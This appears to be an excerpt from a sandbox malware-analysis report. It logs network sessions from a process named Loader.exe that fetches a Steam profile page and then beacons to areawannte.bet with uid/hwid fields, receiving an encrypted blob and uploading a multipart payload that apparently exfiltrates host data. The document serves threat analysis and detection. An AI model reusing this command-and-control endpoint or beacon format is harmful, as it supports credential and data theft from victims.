2025-03-11 00:13:24 UTC	1962	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 X-Frame-Options: SAMEORIGIN Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Tue, 11 Mar 2025 00:13:23 GMT Content-Length: 35725 Connection: close Set-Cookie: sessionid=af6aff254ad5a36120b834a5; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7C1dd948cd7ff32d9bbd82fbd59380fba0; path=/; secure; HttpOnly; SameSite=None
2025-03-11 00:13:24 UTC	14422	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 20 44 65 73 6b 74 6f 70 55 49 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e Data Ascii: <!DOCTYPE html><html class=" responsive DesktopUI" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21">
2025-03-11 00:13:24 UTC	10154	IN	Data Raw: 79 70 65 3d 22 73 65 6c 65 63 74 6f 72 22 20 64 61 74 61 2d 74 6f 6f 6c 74 69 70 2d 63 6f 6e 74 65 6e 74 3d 22 2e 73 75 62 6d 65 6e 75 5f 43 6f 6d 6d 75 6e 69 74 79 22 3e 0a 09 09 09 09 43 4f 4d 4d 55 4e 49 54 59 09 09 09 3c 2f 61 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 5f 43 6f 6d 6d 75 6e 69 74 79 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 22 20 64 61 74 61 2d 73 75 62 6d 65 6e 75 69 64 3d 22 43 6f 6d 6d 75 6e 69 74 79 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 22 3e 0a 09 09 09 09 09 09 48 6f 6d 65 09 09 09 09 09 09 09 09 Data Ascii: ype="selector" data-tooltip-content=".submenu_Community">COMMUNITY</a><div class="submenu_Community" style="display: none;" data-submenuid="Community"><a class="submenuitem" href="https://steamcommunity.com/">Home
2025-03-11 00:13:24 UTC	11149	IN	Data Raw: 75 6f 74 3b 45 52 45 41 4c 4d 26 71 75 6f 74 3b 3a 31 2c 26 71 75 6f 74 3b 4c 4f 47 49 4e 5f 42 41 53 45 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 6c 6f 67 69 6e 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 41 56 41 54 41 52 5f 42 41 53 45 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 61 76 61 74 61 72 73 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 46 52 4f 4d 5f 57 45 42 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 57 45 42 53 49 54 45 5f 49 44 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 43 6f 6d 6d 75 6e 69 74 79 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 42 41 Data Ascii: uot;EREALM":1,"LOGIN_BASE_URL":"https:\/\/login.steampowered.com\/","AVATAR_BASE_URL":"https:\/\/avatars.fastly.steamstatic.com\/","FROM_WEB":true,"WEBSITE_ID":"Community","BA

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49695	188.114.96.3	443	7660	C:\Users\user\Desktop\Loader.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-11 00:13:26 UTC	265	OUT	POST /aRIsjI HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 61 Host: areawannte.bet
2025-03-11 00:13:26 UTC	61	OUT	Data Raw: 75 69 64 3d 38 36 36 66 63 62 64 30 34 33 33 30 61 38 63 61 31 33 37 37 34 66 30 66 62 31 34 66 35 63 39 33 30 62 32 66 39 30 32 36 37 36 37 37 31 62 61 61 31 38 65 30 26 63 69 64 3d Data Ascii: uid=866fcbd04330a8ca13774f0fb14f5c930b2f902676771baa18e0&cid=
2025-03-11 00:13:46 UTC	792	IN	HTTP/1.1 200 OK Date: Tue, 11 Mar 2025 00:13:46 GMT Content-Type: application/octet-stream Content-Length: 14134 Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G5ayWhISgVCpylMiHv%2Bg17qy9pFppiVWaSN65M8V6Sa3iFo%2FdNF7bZ%2FkBLUIkOHX8ECO2lAq505x9qkAmzWJzrS%2B3EHhBK50yGJc0s0OIlaffckR1HuIFcGQLL7j09Vt%2BA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91e6d88ef9fb60c7-JAX alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=18548&min_rtt=17744&rtt_var=8262&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=962&delivery_rate=119778&cwnd=251&unsent_bytes=0&cid=4df037498de639d3&ts=20576&x=0"
2025-03-11 00:13:46 UTC	577	IN	Data Raw: d4 52 93 c9 b3 6b bd 17 f1 58 d8 ef 05 7a fa ca 00 5b 5e b9 6f 9c 2e d6 cb b2 2b 5d f9 c3 10 9f fb b8 96 2a de 3d c9 d2 a7 50 c2 3d e5 2c 24 f3 e9 fa 0a 1f 38 71 af e9 a6 fb c8 c2 d5 9b 93 1f 1d aa f9 e9 7b dc b2 92 81 92 c5 d4 fb a4 a6 e0 a7 ee 88 db 86 32 be 5d 30 66 aa c9 b1 8d 39 34 7c e6 6d 0d 5a 46 5f c5 66 e0 43 b0 0d cd 61 67 b7 e3 c0 e0 f0 3b c6 0f b5 8d 18 94 fe 65 cb 63 56 97 76 19 54 99 80 fa fc 15 34 5f 1b 0b de 48 fc 6a 9a 60 7d 56 16 d2 ec 5f 63 58 c2 f2 ad 19 1c 7e 4f e6 bf 5c 54 96 76 8b 12 52 b9 2d c4 4e e6 2c 4e 4b 76 82 1a 2b 43 ad 85 60 6d 8a fc a3 bc 42 c1 49 8d d9 ce f5 ef 6f df ea 72 78 2e 7a 14 8f e8 03 dd 30 a7 0a e5 70 af bc 07 96 15 94 3e 17 ba 7a bc 74 63 0e e9 e1 e7 9e c6 d4 3a 16 e2 51 ad 99 2a 5d a0 17 56 9a 1d ca 2e 1d 70 Data Ascii: RkXz[^o.+]=P=,$8q{2]0f94\|mZF_fCag;ecVvT4_Hj`}V_cX~O\TvR-N,NKv+C`mBIorx.z0p>ztc:Q]V.p
2025-03-11 00:13:46 UTC	1369	IN	Data Raw: 17 7c 0a c9 a3 a9 c7 ae 24 53 49 35 db de fe e9 de ef bd 74 9f 4e 0a 16 6f 53 26 5a b3 15 b2 46 ba 3a 58 6d 2b 3f e9 f2 ce 54 9a 69 8e 6d e0 5b 2d 00 ae ab b6 f8 7f 40 0b 86 f3 46 8c 9e ec c5 29 2f 7a df 90 bb 38 89 c7 aa 0d 6c 61 31 81 3a a0 91 5e a4 e8 cc ec f0 20 d3 52 bc 1f 9a e2 43 e8 2a dd 0e 3d 00 aa a8 1c 87 b0 d2 4a 17 f0 eb 17 30 4b 96 c3 22 e7 65 57 c2 bd e6 b0 59 bb 11 ae f1 09 cc fd 7b a8 f0 de 63 e6 4a b7 fe 17 88 5c ec 5b 2a 7c e4 c0 6e 8f 4c a1 29 27 53 4d a9 a5 d1 8b ec b2 52 a5 6f 19 d0 4d 71 24 77 b2 c8 6e a5 fe 07 90 d9 58 b5 95 bf c0 da 63 50 3f 62 0f 80 8d 81 e3 63 f4 b4 f8 03 c8 6d 56 e7 c9 62 15 e2 5a 6d 9f d4 90 8d 39 f6 1d 1f af 9c b4 cc 54 3b f1 d8 e6 a8 f4 01 58 05 ff ee 3f 26 2c ba 46 43 52 2b 4e 9d 57 58 94 43 2e 11 c6 be e1 Data Ascii: \|$SI5tNoS&ZF:Xm+?Tim[-@F)/z8la1:^ RC=J0K"eWY{cJ\[\|nL)'SMRoMq$wnXcP?bcmVbZm9T;X?&,FCR+NWXC.
2025-03-11 00:13:46 UTC	1369	IN	Data Raw: f4 77 73 26 fd 69 bc 6a 99 42 db c9 a3 c4 25 09 2e 86 01 fd 01 a1 2a 9f ae 09 bb 32 41 08 f5 c4 a8 fe 5f 52 15 ed e0 cf db 22 17 72 73 af 42 f5 4e cb e1 72 4b 96 7c 72 44 b2 49 47 50 b1 f0 97 64 7f 99 66 d8 cf 0f 38 91 8c 0e c6 68 6c 5d 70 ec 32 99 f1 fc e0 39 80 ce 84 59 18 02 9b 43 ee c9 74 6f 8d da ed 06 59 fb 2f 95 ab 61 36 55 2e e0 54 e0 c3 df e2 1f 4a ca 28 5f 6d 2c 37 22 55 9f ad 53 ef 1a 7a 41 fe 1c 7a f5 9f db de d0 23 02 38 ee 7a d9 95 ad 60 b6 f1 18 b0 c2 13 bb d2 b9 85 32 e1 1f 8f a9 26 bd 4e a4 6a 57 a4 6a ea ef 55 e1 71 86 e4 ab ee e3 e5 69 16 56 6d 3b 22 3f dc 09 0d aa 35 c3 99 c6 a9 11 2a 19 15 0d 6e 81 1e 9b 58 d9 41 b3 49 a4 3e 2c fa 0d 97 a7 9e f4 18 0f ce 59 50 fe c4 24 24 0b 8c 34 c6 ff 4a 5a a6 66 ce 88 91 e9 ee e0 8c 6a b0 0a 0b 2e Data Ascii: ws&ijB%.2A_R"rsBNrK\|rDIGPdf8hl]p29YCtoY/a6U.TJ(_m,7"USzAz#8z`2&NjWjUqiVm;"?5nXAI>,YP$$4JZfj.
2025-03-11 00:13:46 UTC	1369	IN	Data Raw: 2a 3c 2e b5 ad 89 b0 86 6a a1 6a 67 2f 63 a9 4a 73 6c f4 aa 93 9d 7e 2c bd 09 b4 2d 94 34 2c 5c fa 27 f0 f8 59 89 98 e4 10 9a ab c4 97 2a c4 09 ac 1f 49 58 55 3f c7 48 ee 7d d6 d9 f5 b0 70 74 d5 d3 10 0d 29 77 2a 4d 53 4c 63 42 a2 db b9 44 6c e7 10 d2 c6 53 24 ea 89 f6 43 8d 7c 79 6d b0 95 1f 36 83 6a e7 30 ae 06 ad 56 ce 66 66 2a dc 57 06 c5 56 f6 78 e6 26 36 f9 22 44 04 87 c4 c7 4a c3 f5 05 73 00 7e 94 03 b4 41 4e b4 c6 32 65 5b df 3f 3f f1 f7 94 06 cc 1e 0e a8 21 2f 30 28 9d 84 2a 30 5e 15 f4 ab 4d f3 4d b3 2e 4d 76 ed 12 75 b5 12 b6 87 02 0c bf 57 db 1a 4f b9 bc 67 c1 9f 64 5e 19 4d d7 26 2d 4b f8 25 bc fd 45 65 3a 3c 28 a2 c2 73 94 aa a1 60 0f ca 45 53 f9 85 cb f1 79 ce 12 b8 0d 8f 12 bc a6 c4 bd 2c 4e df 52 61 31 57 cf 3a 4e 36 c5 9e ef 2d fd e6 2a Data Ascii: <.jjg/cJsl~,-4,\'YIXU?H}pt)wMSLcBDlS$C\|ym6j0VffWVx&6"DJs~AN2e[??!/0(0^MM.MvuWOgd^M&-K%Ee:<(s`ESy,NRa1W:N6-
2025-03-11 00:13:46 UTC	1369	IN	Data Raw: 8a 6b 62 75 43 8f 45 f7 e3 88 91 67 b4 c2 60 2b ad 3e 31 6a f9 8d 98 d2 8c 5d 0c de 58 68 a6 d2 f3 63 01 70 c8 17 f8 f2 c9 da 16 0f f9 68 77 b8 78 4c 08 4d 1e 4a ee f7 7d 14 63 8c 6f 94 1b eb b9 a4 10 bf f3 b6 4b 15 5b f3 97 40 e1 88 d2 28 ba 60 95 49 94 87 e1 c5 38 2e ed 94 0f 9b de c7 7b e6 5a 45 11 72 52 bf ba 52 06 d6 5c e6 92 6f c3 b6 7d 50 eb 7a 28 8f a2 6a bb 0f 68 84 29 fd 31 f0 5c 11 8b 94 f4 e4 25 2e 26 88 91 2c 2c dd 30 a5 09 92 31 dc 90 32 42 43 7e f0 e1 d7 76 93 b1 03 84 e3 2a 0f 10 0a 68 ae 7a 4a 51 73 39 c0 9b 2b a8 fe 4c a0 3c eb d9 d3 11 69 3a 63 1b 5d 82 7b 6f de 7d e2 df a0 f7 f1 88 89 da be e2 3e b7 da 50 07 9f 1d 8f 36 8a e2 fb c2 b1 89 8f 41 2e 52 27 d0 4e c5 bd 35 72 65 09 10 31 56 4b 2d e8 c7 e9 d4 de 27 cd 17 15 5a 3e 58 36 74 32 Data Ascii: kbuCEg`+>1j]XhcphwxLMJ}coK[@(`I8.{ZErRR\o}Pz(jh)1\%.&,,012BC~v*hzJQs9+L<i:c]{o}>P6A.R'N5re1VK-'Z>X6t2
2025-03-11 00:13:46 UTC	1369	IN	Data Raw: ec 73 8e 30 71 27 15 c7 b3 64 7f df 95 28 2e e7 8d fa a8 00 02 3e 27 28 f3 62 c0 6d 0a 00 d8 39 c1 ef 55 6a 04 88 8e b1 52 b5 13 32 9b 8c 6c 0a 25 82 4d b7 34 4e f7 12 69 e1 60 e0 8f 53 33 db b1 bd 08 50 10 b4 bf b4 23 11 0f 69 37 81 63 d7 7b fd 8f f4 17 57 7a 60 f1 5f 0c ad 35 01 58 c8 be ba f6 f5 f0 32 69 f1 75 6f 7a 95 fd a9 5a da b4 0f 8a 81 58 df 5c 39 dc b9 d0 61 10 1e 95 b7 14 b8 36 03 e9 dd 50 65 8b a9 35 c5 e7 ff d7 66 ef 0d f9 bb b6 d1 45 45 9e aa b0 86 cf 86 f3 59 d3 e6 fd bf 72 df 46 c0 9c b8 48 1f 43 d4 33 b3 36 00 e5 22 d6 24 6f c6 48 5a a8 67 d7 ed e9 a8 0e d2 40 15 52 51 b3 77 d5 06 0e 14 0b 0d 68 da 4d dc fa 6c dc 0c 9a 21 53 53 77 56 c7 e7 01 e8 9a d1 36 07 f6 92 ae 4e 41 0d 48 0c e9 6e cb c3 47 38 d9 9f ca ed d5 78 34 03 ce 0d dc 13 c6 Data Ascii: s0q'd(.>'(bm9UjR2l%M4Ni`S3P#i7c{Wz`_5X2iuozZX\9a6Pe5fEEYrFHC36"$oHZg@RQwhMl!SSwV6NAHnG8x4
2025-03-11 00:13:46 UTC	1369	IN	Data Raw: d3 13 49 18 21 eb 42 01 fa 9a 88 ce ec 66 6e 1f 17 0e 0c 8f aa ef b2 fe 8e f8 cc 5d e9 9c c9 3b cb 1a 74 60 ca 17 93 60 86 e8 b1 ac 2c dd f9 45 69 e6 a6 b2 f4 2b 6c 45 08 85 74 bc 60 ba 9d 24 ad 65 94 c2 7b 9f 13 22 f4 41 31 b2 93 fe b8 15 53 f7 21 14 e0 e2 8e e2 90 76 2e 5a ac d2 ba 32 f4 3a a8 65 91 d0 a5 0c 66 a2 12 55 41 8e 90 80 a3 a1 0a 5d 59 b0 d1 55 70 6e 8c d4 0a 55 c6 f1 2e 3a c6 0a 43 18 f5 ca 0c 86 c3 14 62 8e bb a8 1f 03 34 05 3f 8d 0a e8 5f bb e6 dc 59 77 e7 32 d2 83 86 d1 47 27 33 96 a4 34 6a 37 2b 96 77 f8 1e fb 45 c1 d5 f1 67 69 81 ca 2c f6 90 97 b5 05 56 a0 6a 8f eb 0e 3a de d9 65 bf 74 dd 13 56 60 ac 2c 53 f1 03 45 e2 90 1c ab 97 65 ef 20 84 72 44 7b 5a 7f e2 fa 47 2d 63 ed c7 e3 1c 73 b2 1f 8f 29 24 d7 61 f2 90 66 17 c8 f8 b7 eb 40 93 Data Ascii: I!Bfn];t``,Ei+lEt`$e{"A1S!v.Z2:efUA]YUpnU.:Cb4?_Yw2G'34j7+wEgi,Vj:etV`,SEe rD{ZG-cs)$af@
2025-03-11 00:13:46 UTC	1369	IN	Data Raw: 98 e7 1b 34 de 75 84 6a 2d dc ca 34 eb 1c 5b 7d f5 ef 56 b4 d8 df f0 8c 60 5c 08 32 94 77 34 19 25 02 d8 c7 ea 61 09 7a ce fe c7 ec 2d da 41 04 01 3c af d0 68 b2 9a f2 51 f3 60 bb 4c 7c ea d1 0f c6 15 39 be ce 30 49 e2 e5 c2 b8 32 6a 91 51 46 a3 7f 22 bc cb 11 46 16 e9 4c 21 27 e2 dc 5b b6 6a b1 b6 90 3a 2f d2 ff a0 65 ac fd 65 a6 f1 fc 1c 5a d4 16 41 f6 73 b8 84 30 3b 7a 31 f5 75 d9 8a 69 2a b5 81 fb e3 ae e9 e5 c0 71 7e 55 64 39 94 73 70 26 73 e9 d0 c9 6d 9b c2 1f 88 3c 3b 41 6a 46 1f cb 2e a8 5c 3c a4 25 7e dc a3 8c dd 54 ea 3a 43 00 43 18 b9 79 b4 22 fb 89 90 67 ad c2 b2 47 05 b9 50 da d0 01 8f a8 ef ca c6 5e c3 3f 31 53 ee 50 ac d9 1f 0a d6 52 1a e6 ee c2 3c 75 25 91 50 a0 b8 9e 9b 57 a9 c1 3c 5d 22 e9 5f 7f fb 4e f0 37 01 8e 6f 50 68 a9 fd 9c f6 7c Data Ascii: 4uj-4[}V`\2w4%az-A<hQ`L\|90I2jQF"FL!'[j:/eeZAs0;z1ui*q~Ud9sp&sm<;AjF.\<%~T:CCy"gGP^?1SPR<u%PW<]"_N7oPh\|
2025-03-11 00:13:46 UTC	1369	IN	Data Raw: f4 80 f9 7c 3c d7 e5 a5 af 29 5b be 6e 05 7e 39 80 09 16 29 32 25 56 e6 9f bf 0b bf 51 09 91 5c 79 bf 5b f1 b2 17 00 e1 00 8e 21 24 60 e3 bd e7 aa 9c e2 a6 eb 03 69 f6 68 a6 df 5d 9d f3 3b 33 56 18 03 70 98 08 f6 f9 4d 1d 7d 03 5a 58 a8 c2 d6 7c 9e 5a 1f a3 2d 74 33 9c 9f ad ad 38 af b5 52 62 9b f5 ec bd cd 6c 88 36 73 59 34 82 49 04 3f ff 67 db 0d de 96 27 ef a9 d0 32 01 32 f9 23 d9 f3 01 2a b4 6e ce 3e 95 32 34 c5 b3 45 27 44 e6 91 1c c0 62 6e 2c 2d 90 36 a6 13 13 bb 68 22 37 d4 0d 84 a4 0d 69 e5 0b f6 0c 9a 5d a1 e3 97 10 11 3e 45 a0 5c 12 fe 9d aa 52 11 2c 74 59 d2 88 a5 3e 53 a5 e5 e1 5f 3f 4d 2b 79 00 40 f1 6e ff 34 c8 ed 0c dd 15 51 ea 64 0d 43 39 41 a7 f9 c7 1b 6d 4e 17 a1 b3 15 90 0e 7b 72 70 04 0f d3 21 bd b4 b6 0f e6 90 14 f1 51 d8 da af 9d a4 Data Ascii: \|<)[n~9)2%VQ\y[!$`ih];3VpM}ZX\|Z-t38Rbl6sY4I?g'22#*n>24E'Dbn,-6h"7i]>E\R,tY>S_?M+y@n4QdC9AmN{rp!Q

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49700	92.122.104.90	443	7660	C:\Users\user\Desktop\Loader.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-11 00:13:48 UTC	94	OUT	GET /profiles/76561199822375128 HTTP/1.1 Connection: Keep-Alive Host: steamcommunity.com
2025-03-11 00:13:49 UTC	1962	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 X-Frame-Options: SAMEORIGIN Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Tue, 11 Mar 2025 00:13:49 GMT Content-Length: 35725 Connection: close Set-Cookie: sessionid=aee95bf950871c9a6d369ace; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7C1dd948cd7ff32d9bbd82fbd59380fba0; path=/; secure; HttpOnly; SameSite=None
2025-03-11 00:13:49 UTC	14422	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 20 44 65 73 6b 74 6f 70 55 49 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e Data Ascii: <!DOCTYPE html><html class=" responsive DesktopUI" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21">
2025-03-11 00:13:49 UTC	10154	IN	Data Raw: 79 70 65 3d 22 73 65 6c 65 63 74 6f 72 22 20 64 61 74 61 2d 74 6f 6f 6c 74 69 70 2d 63 6f 6e 74 65 6e 74 3d 22 2e 73 75 62 6d 65 6e 75 5f 43 6f 6d 6d 75 6e 69 74 79 22 3e 0a 09 09 09 09 43 4f 4d 4d 55 4e 49 54 59 09 09 09 3c 2f 61 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 5f 43 6f 6d 6d 75 6e 69 74 79 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 22 20 64 61 74 61 2d 73 75 62 6d 65 6e 75 69 64 3d 22 43 6f 6d 6d 75 6e 69 74 79 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 22 3e 0a 09 09 09 09 09 09 48 6f 6d 65 09 09 09 09 09 09 09 09 Data Ascii: ype="selector" data-tooltip-content=".submenu_Community">COMMUNITY</a><div class="submenu_Community" style="display: none;" data-submenuid="Community"><a class="submenuitem" href="https://steamcommunity.com/">Home
2025-03-11 00:13:49 UTC	11149	IN	Data Raw: 75 6f 74 3b 45 52 45 41 4c 4d 26 71 75 6f 74 3b 3a 31 2c 26 71 75 6f 74 3b 4c 4f 47 49 4e 5f 42 41 53 45 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 6c 6f 67 69 6e 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 41 56 41 54 41 52 5f 42 41 53 45 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 61 76 61 74 61 72 73 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 46 52 4f 4d 5f 57 45 42 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 57 45 42 53 49 54 45 5f 49 44 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 43 6f 6d 6d 75 6e 69 74 79 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 42 41 Data Ascii: uot;EREALM":1,"LOGIN_BASE_URL":"https:\/\/login.steampowered.com\/","AVATAR_BASE_URL":"https:\/\/avatars.fastly.steamstatic.com\/","FROM_WEB":true,"WEBSITE_ID":"Community","BA

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49701	188.114.96.3	443	7660	C:\Users\user\Desktop\Loader.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-11 00:13:51 UTC	281	OUT	POST /aRIsjI HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=f4hWwb3UZDdWUI0V User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 14919 Host: areawannte.bet
2025-03-11 00:13:51 UTC	14919	OUT	Data Raw: 2d 2d 66 34 68 57 77 62 33 55 5a 44 64 57 55 49 30 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 38 36 36 66 63 62 64 30 34 33 33 30 61 38 63 61 31 33 37 37 34 66 30 66 62 31 34 66 35 63 39 33 30 62 32 66 39 30 32 36 37 36 37 37 31 62 61 61 31 38 65 30 0d 0a 2d 2d 66 34 68 57 77 62 33 55 5a 44 64 57 55 49 30 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 66 34 68 57 77 62 33 55 5a 44 64 57 55 49 30 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d Data Ascii: --f4hWwb3UZDdWUI0VContent-Disposition: form-data; name="uid"866fcbd04330a8ca13774f0fb14f5c930b2f902676771baa18e0--f4hWwb3UZDdWUI0VContent-Disposition: form-data; name="pid"2--f4hWwb3UZDdWUI0VContent-Disposition: form-data; name="hwid"
